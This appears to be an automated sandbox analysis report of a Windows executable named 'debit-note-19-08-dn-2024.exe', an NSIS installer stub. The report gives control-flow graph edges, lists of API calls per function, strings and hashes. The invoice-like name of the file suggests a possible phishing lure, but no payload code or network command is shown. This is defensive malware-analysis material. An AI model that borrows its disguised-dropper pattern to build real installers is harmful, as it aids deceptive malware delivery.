4297->4303 4310 402d1a 4297->4310 4298->4287 4299->4291 4301 405c37 ReadFile 4300->4301 4302 40330c 4301->4302 4302->4297 4304 406413 4303->4304 4307 40641b 4303->4307 4304->4297 4305 4064a2 GlobalFree 4306 4064ab GlobalAlloc 4305->4306 4306->4304 4306->4307 4307->4304 4307->4305 4307->4306 4308 406522 GlobalAlloc 4307->4308 4309 406519 GlobalFree 4307->4309 4308->4304 4308->4307 4309->4308 4311 402d43 4310->4311 4312 402d2b 4310->4312 4314 402d53 GetTickCount 4311->4314 4315 402d4b 4311->4315 4313 402d34 DestroyWindow 4312->4313 4318 402d3b 4312->4318 4313->4318 4317 402d61 4314->4317 4314->4318 4325 4062eb 4315->4325 4319 402d96 CreateDialogParamW ShowWindow 4317->4319 4320 402d69 4317->4320 4318->4297 4319->4318 4320->4318 4329 402cfe 4320->4329 4322 402d77 wsprintfW 4323 4051f2 25 API calls 4322->4323 4324 402d94 4323->4324 4324->4318 4326 406308 PeekMessageW 4325->4326 4327 406318 4326->4327 4328 4062fe DispatchMessageW 4326->4328 4327->4318 4328->4326 4330 402d0d 4329->4330 4331 402d0f MulDiv 4329->4331 4330->4331 4331->4322 4332 405331 4333 405352 GetDlgItem GetDlgItem GetDlgItem 4332->4333 4334 4054dd 4332->4334 4378 4041cf SendMessageW 4333->4378 4336 4054e6 GetDlgItem CreateThread CloseHandle 4334->4336 4339 40550e 4334->4339 4336->4339 4381 4052c5 OleInitialize 4336->4381 4337 4053c3 4344 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4337->4344 4338 405539 4342 405545 4338->4342 4343 405599 4338->4343 4339->4338 4340 405525 ShowWindow ShowWindow 4339->4340 4341 40555e 4339->4341 4380 4041cf SendMessageW 4340->4380 4348 404201 8 API calls 4341->4348 4346 405573 ShowWindow 4342->4346 4347 40554d 4342->4347 4343->4341 4353 4055a7 SendMessageW 4343->4353 4351 405439 4344->4351 4352 40541d SendMessageW SendMessageW 4344->4352 4349 405593 4346->4349 4350 405585 4346->4350 4354 404173 SendMessageW 4347->4354 4355 40556c 4348->4355 4357 404173 SendMessageW 4349->4357 4356 4051f2 25 API calls 4350->4356 4358 40544c 4351->4358 4359 40543e SendMessageW 4351->4359 4352->4351 4353->4355 4360 4055c0 CreatePopupMenu 4353->4360 4354->4341 4356->4349 4357->4343 4362 40419a 19 API calls 4358->4362 4359->4358 4361 405f6a 18 API calls 4360->4361 4363 4055d0 AppendMenuW 4361->4363 4364 40545c 4362->4364 4365 405600 TrackPopupMenu 4363->4365 4366 4055ed GetWindowRect 4363->4366 4367 405465 ShowWindow 4364->4367 4368 405499 GetDlgItem SendMessageW 4364->4368 4365->4355 4370 40561b 4365->4370 4366->4365 4371 405488 4367->4371 4372 40547b ShowWindow 4367->4372 4368->4355 4369 4054c0 SendMessageW SendMessageW 4368->4369 4369->4355 4373 405637 SendMessageW 4370->4373 4379 4041cf SendMessageW 4371->4379 4372->4371 4373->4373 4374 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4373->4374 4376 405679 SendMessageW 4374->4376 4376->4376 4377 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4376->4377 4377->4355 4378->4337 4379->4368 4380->4338 4382 4041e6 SendMessageW 4381->4382 4383 4052e8 4382->4383 4386 40530f 4383->4386 4387 401389 2 API calls 4383->4387 4384 4041e6 SendMessageW 4385 405321 OleUninitialize 4384->4385 4386->4384 4387->4383 5537 404635 5538 404661 5537->5538 5539 404672 5537->5539 5598 405708 GetDlgItemTextW 5538->5598 5540 40467e GetDlgItem 5539->5540 5547 4046dd 5539->5547 5543 404692 5540->5543 5542 40466c 5545 4061dc 5 API calls 5542->5545 5546 4046a6 SetWindowTextW 5543->5546 5550 405a3e 4 API calls 5543->5550 5544 4047c1 5596 404955 5544->5596 5600 405708 GetDlgItemTextW 5544->5600 5545->5539 5551 40419a 19 API calls 5546->5551 5547->5544 5552 405f6a 18 API calls 5547->5552 5547->5596 5549 404201 8 API calls 5554 404969 5549->5554 5555 40469c 5550->5555 5556 4046c2 5551->5556 5557 404751 SHBrowseForFolderW 5552->5557 5553 4047f1 5558 405a9b 18 API calls 5553->5558 5555->5546 5562 405993 3 API calls 5555->5562 5559 40419a 19 API calls 5556->5559 5557->5544 5560 404769 CoTaskMemFree 5557->5560 5561 4047f7 5558->5561 5563 4046d0 5559->5563 5564 405993 3 API calls 5560->5564 5601 405f48 lstrcpynW 5561->5601 5562->5546 5599 4041cf SendMessageW 5563->5599 5566 404776 5564->5566 5569 4047ad SetDlgItemTextW 5566->5569 5573 405f6a 18 API calls 5566->5573 5568 4046d6 5571 4062b2 3 API calls 5568->5571 5569->5544 5570 40480e 5572 4062b2 3 API calls 5570->5572 5571->5547 5580 404816 5572->5580 5574 404795 lstrcmpiW 5573->5574 5574->5569 5576 4047a6 lstrcatW 5574->5576 5575 404855 5602 405f48 lstrcpynW 5575->5602 5576->5569 5578 40485c 5579 405a3e 4 API calls 5578->5579 5581 404862 GetDiskFreeSpaceW 5579->5581 5580->5575 5584 4059df 2 API calls 5580->5584 5585 4048a7 5580->5585 5583 404885 MulDiv 5581->5583 5581->5585 5583->5585 5584->5580 5586 4049d6 21 API calls 5585->5586 5595 404904 5585->5595 5587 4048f6 5586->5587 5590 404906 SetDlgItemTextW 5587->5590 5591 4048fb 5587->5591 5588 40140b 2 API calls 5589 404927 5588->5589 5603 4041bc KiUserCallbackDispatcher 5589->5603 5590->5595 5593 4049d6 21 API calls 5591->5593 5593->5595 5594 404943 5594->5596 5604 4045ca 5594->5604 5595->5588 5595->5589 5596->5549 5598->5542 5599->5568 5600->5553 5601->5570 5602->5578 5603->5594 5605 4045d8 5604->5605 5606 4045dd SendMessageW 5604->5606 5605->5606 5606->5596 5607 4027b5 5608 402b3a 18 API calls 5607->5608 5609 4027c3 5608->5609 5610 4027d9 5609->5610 5611 402b3a 18 API calls 5609->5611 5612 405b8f 2 API calls 5610->5612 5611->5610 5613 4027df 5612->5613 5633 405bb4 GetFileAttributesW CreateFileW 5613->5633 5615 4027ec 5616 402895 5615->5616 5617 4027f8 GlobalAlloc 5615->5617 5620 4028b0 5616->5620 5621 40289d DeleteFileW 5616->5621 5618 402811 5617->5618 5619 40288c CloseHandle 5617->5619 5634 40330f SetFilePointer 5618->5634 5619->5616 5621->5620 5623 402817 5624 4032f9 ReadFile 5623->5624 5625 402820 GlobalAlloc 5624->5625 5626 402830 5625->5626 5627 402864 WriteFile GlobalFree 5625->5627 5629 403062 46 API calls 5626->5629 5628 403062 46 API calls 5627->5628 5630 402889 5628->5630 5632 40283d 5629->5632 5630->5619 5631 40285b GlobalFree 5631->5627 5632->5631 5633->5615 5634->5623 5635 4028b6 5636 402b1d 18 API calls 5635->5636 5637 4028bc 5636->5637 5638 4028f8 5637->5638 5639 4028df 5637->5639 5643 402793 5637->5643 5641 402902 5638->5641 5642 40290e 5638->5642 5640 4028e4 5639->5640 5648 4028f5 5639->5648 5649 405f48 lstrcpynW 5640->5649 5644 402b1d 18 API calls 5641->5644 5645 405f6a 18 API calls 5642->5645 5644->5648 5645->5648 5648->5643 5650 405e8f wsprintfW 5648->5650 5649->5643 5650->5643 5651 404337 5652 40434f 5651->5652 5658 404469 5651->5658 5659 40419a 19 API calls 5652->5659 5653 4044d3 5654 4045a5 5653->5654 5655 4044dd GetDlgItem 5653->5655 5660 404201 8 API calls 5654->5660 5656 404566 5655->5656 5657 4044f7 5655->5657 5656->5654 5666 404578 5656->5666 5657->5656 5665 40451d 6 API calls 5657->5665 5658->5653 5658->5654 5661 4044a4 GetDlgItem SendMessageW 5658->5661 5662 4043b6 5659->5662 5664 4045a0 5660->5664 5682 4041bc KiUserCallbackDispatcher 5661->5682 5663 40419a 19 API calls 5662->5663 5668 4043c3 CheckDlgButton 5663->5668 5665->5656 5669 40458e 5666->5669 5670 40457e SendMessageW 5666->5670 5680 4041bc KiUserCallbackDispatcher 5668->5680 5669->5664 5673 404594 SendMessageW 5669->5673 5670->5669 5671 4044ce 5674 4045ca SendMessageW 5671->5674 5673->5664 5674->5653 5675 4043e1 GetDlgItem 5681 4041cf SendMessageW 5675->5681 5677 4043f7 SendMessageW 5678 404414 GetSysColor 5677->5678 5679 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5677->5679 5678->5679 5679->5664 5680->5675 5681->5677 5682->5671 5683 4014b8 5684 4014be 5683->5684 5685 401389 2 API calls 5684->5685 5686 4014c6 5685->5686 4691 4015b9 4692 402b3a 18 API calls 4691->4692 4693 4015c0 4692->4693 4694 405a3e 4 API calls 4693->4694 4701 4015c9 4694->4701 4695 401614 4697 401646 4695->4697 4698 401619 4695->4698 4696 4059c0 CharNextW 4699 4015d7 CreateDirectoryW 4696->4699 4703 401423 25 API calls 4697->4703 4700 401423 25 API calls 4698->4700 4699->4701 4702 4015ed GetLastError 4699->4702 4704 401620 4700->4704 4701->4695 4701->4696 4702->4701 4705 4015fa GetFileAttributesW 4702->4705 4708 40163e 4703->4708 4709 405f48 lstrcpynW 4704->4709 4705->4701 4707 40162d SetCurrentDirectoryW 4707->4708 4709->4707 5687 401939 5688 402b3a 18 API calls 5687->5688 5689 401940 lstrlenW 5688->5689 5690 4024e8 5689->5690 5691 40293b 5692 402b1d 18 API calls 5691->5692 5693 402941 5692->5693 5694 402974 5693->5694 5695 402793 5693->5695 5697 40294f 5693->5697 5694->5695 5696 405f6a 18 API calls 5694->5696 5696->5695 5697->5695 5699 405e8f wsprintfW 5697->5699 5699->5695 4925 40173f 4926 402b3a 18 API calls 4925->4926 4927 401746 4926->4927 4928 405be3 2 API calls 4927->4928 4929 40174d 4928->4929 4930 405be3 2 API calls 4929->4930 4930->4929 5707 10002a7f 5708 10002a97 5707->5708 5709 1000158f 2 API calls 5708->5709 5710 10002ab2 5709->5710

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 17 403432-403436 14->17 18 40342c-403431 14->18 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 20 4034f7-403506 call 4059c0 17->20 21 40343c-403442 17->21 18->17 20->11 39 403508-403509 20->39 26 403444-40344b 21->26 27 40345c-403495 21->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 31 403452 26->31 32 40344d-403450 26->32 33 4034b2-4034ec 27->33 34 403497-40349c 27->34 31->27 32->27 32->31 36 4034f4-4034f6 33->36 37 4034ee-4034f2 33->37 34->33 40 40349e-4034a6 34->40 36->20 37->36 44 403518-403525 call 405f48 37->44 39->11 41 4034a8-4034ab 40->41 42 4034ad 40->42 41->33 41->42 42->33 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 48 403657-40365e call 40391f 46->48 49 4035c8-4035d3 call 4059c0 46->49 59 403663 48->59 63 403621-40362b 49->63 64 4035d5-40360a 49->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 68 403823-403827 ExitProcess 61->68 69 40381f 61->69 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 66 403692-4036ac lstrcatW lstrcmpiW 63->66 67 40362d-40363b call 405a9b 63->67 71 40360c-403610 64->71 66->45 73 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 66->73 67->45 83 40363d-403653 call 405f48 * 2 67->83 69->68 75 403612-403617 71->75 76 403619-40361d 71->76 79 4036d1-4036fa call 405f48 73->79 80 4036c6-4036cc call 405f48 73->80 75->76 77 40361f 75->77 76->71 76->77 77->63 91 4036ff-40371b call 405f6a DeleteFileW 79->91 80->79 83->48 102 40375c-403764 91->102 103 40371d-40372d CopyFileW 91->103 105 403801-40380c ExitWindowsEx 92->105 106 4037f5-4037ff 92->106 93->92 96 4037a1-4037a3 93->96 96->92 100 4037a5-4037b7 GetCurrentProcess 96->100 100->92 115 4037b9-4037db 100->115 102->91 104 403766-40376d call 405de2 102->104 103->102 107 40372f-40374f call 405de2 call 405f6a call 4056c3 103->107 104->45 105->61 109 40380e-403810 call 40140b 105->109 106->105 106->109 107->102 122 403751-403758 CloseHandle 107->122 109->61 115->92 122->102
                                APIs
                                • #17.COMCTL32 ref: 00403379
                                • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                • OleInitialize.OLE32(00000000), ref: 0040338B
                                  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                  • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                  • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000), ref: 004033DB
                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000020), ref: 00403403
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                • OleUninitialize.OLE32(?), ref: 0040366C
                                • ExitProcess.KERNEL32 ref: 0040368C
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000,?), ref: 00403698
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000,?), ref: 004036A4
                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,0041FEA8,00000001), ref: 00403725
                                • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                • ExitProcess.KERNEL32 ref: 00403827
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                • String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe$C:\Users\user\brugerlicensaftalerne$C:\Users\user\brugerlicensaftalerne\Isidora$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                • API String ID: 4107622049-951708311
                                • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 145 405439-40543c 124->145 146 40541d-405437 SendMessageW * 2 124->146 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 149 40556c-405570 134->149 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 147 4055a7-4055ba SendMessageW 138->147 143 405593-405594 call 404173 140->143 144 405585-40558e call 4051f2 140->144 141->134 143->136 144->143 152 40544c-405463 call 40419a 145->152 153 40543e-40544a SendMessageW 145->153 146->145 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 147->154 155 4056bc-4056be 147->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->149 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 168 405637-405652 SendMessageW 165->168 169 40548e-405494 call 4041cf 166->169 167->169 168->168 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00405390
                                • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                • GetClientRect.USER32(?,?), ref: 004053DC
                                • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                • ShowWindow.USER32(?,00000008), ref: 00405480
                                • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                  • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                • ShowWindow.USER32(00000000), ref: 0040552C
                                • ShowWindow.USER32(?,00000008), ref: 00405531
                                • ShowWindow.USER32(00000008), ref: 0040557B
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                • CreatePopupMenu.USER32 ref: 004055C0
                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                • GetWindowRect.USER32(?,?), ref: 004055F4
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                • OpenClipboard.USER32(00000000), ref: 00405655
                                • EmptyClipboard.USER32 ref: 0040565B
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                • GlobalLock.KERNEL32(00000000), ref: 00405671
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                • CloseClipboard.USER32 ref: 004056B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID: {$&B
                                • API String ID: 590372296-2518801558
                                • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 418 405f6a-405f75 419 405f77-405f86 418->419 420 405f88-405f9e 418->420 419->420 421 405fa4-405fb1 420->421 422 4061b6-4061bc 420->422 421->422 423 405fb7-405fbe 421->423 424 4061c2-4061cd 422->424 425 405fc3-405fd0 422->425 423->422 427 4061d8-4061d9 424->427 428 4061cf-4061d3 call 405f48 424->428 425->424 426 405fd6-405fe2 425->426 429 4061a3 426->429 430 405fe8-406024 426->430 428->427 432 4061b1-4061b4 429->432 433 4061a5-4061af 429->433 434 406144-406148 430->434 435 40602a-406035 GetVersion 430->435 432->422 433->422 438 40614a-40614e 434->438 439 40617d-406181 434->439 436 406037-40603b 435->436 437 40604f 435->437 436->437 442 40603d-406041 436->442 445 406056-40605d 437->445 443 406150-40615c call 405e8f 438->443 444 40615e-40616b call 405f48 438->444 440 406190-4061a1 lstrlenW 439->440 441 406183-40618b call 405f6a 439->441 440->422 441->440 442->437 447 406043-406047 442->447 456 406170-406179 443->456 444->456 449 406062-406064 445->449 450 40605f-406061 445->450 447->437 452 406049-40604d 447->452 454 4060a0-4060a3 449->454 455 406066-406083 call 405e15 449->455 450->449 452->445 457 4060b3-4060b6 454->457 458 4060a5-4060b1 GetSystemDirectoryW 454->458 464 406088-40608c 455->464 456->440 460 40617b 456->460 462 406121-406123 457->462 463 4060b8-4060c6 GetWindowsDirectoryW 457->463 461 406125-406129 458->461 465 40613c-406142 call 4061dc 460->465 461->465 468 40612b-40612f 461->468 462->461 466 4060c8-4060d2 462->466 463->462 467 406092-40609b call 405f6a 464->467 464->468 465->440 473 4060d4-4060d7 466->473 474 4060ec-406102 SHGetSpecialFolderLocation 466->474 467->461 468->465 471 406131-406137 lstrcatW 468->471 471->465 473->474 476 4060d9-4060e0 473->476 477 406104-40611b SHGetPathFromIDListW CoTaskMemFree 474->477 478 40611d 474->478 479 4060e8-4060ea 476->479 477->461 477->478 478->462 479->461 479->474
                                APIs
                                • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                • CoTaskMemFree.OLE32(?), ref: 00406113
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                • lstrlenW.KERNEL32(Call,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 900638850-1230650788
                                • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                Control-flow Graph

                                • Executed
                                • Not Executed
